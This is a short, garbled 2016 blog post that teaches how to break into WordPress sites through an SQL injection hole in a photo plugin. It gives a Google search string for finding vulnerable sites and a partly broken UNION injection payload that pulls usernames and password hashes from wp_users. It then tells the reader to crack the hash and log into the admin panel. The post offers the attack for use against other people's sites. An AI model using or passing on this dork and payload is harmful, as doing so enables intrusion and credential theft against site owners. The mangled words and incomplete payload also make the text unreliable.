Thursday, May 26, 2016

How to Wordpress website with Phototrace SQLi vulnerability

Hi here i tell you how towordpresssite with sy way i will use toites i saw lots of Messages that say "hey help can anyone can tell me how towordpress" and it's an sy way with ?

First we srch with this in google to find sitesinurl:"wp-content/plugins/photor/viewimg.p?id="

see the Result :-

and i'm gonna test 1 of them for ex this find in google

we are going to add the : this is the


and the site look like this,2,3,4,5,con(user_login,0x3a,user_pass),7,8,9+from+wp_users--

now you can see the user and pass :D ! Just the hash and it's done
The admin panel is

No comments:

Post a Comment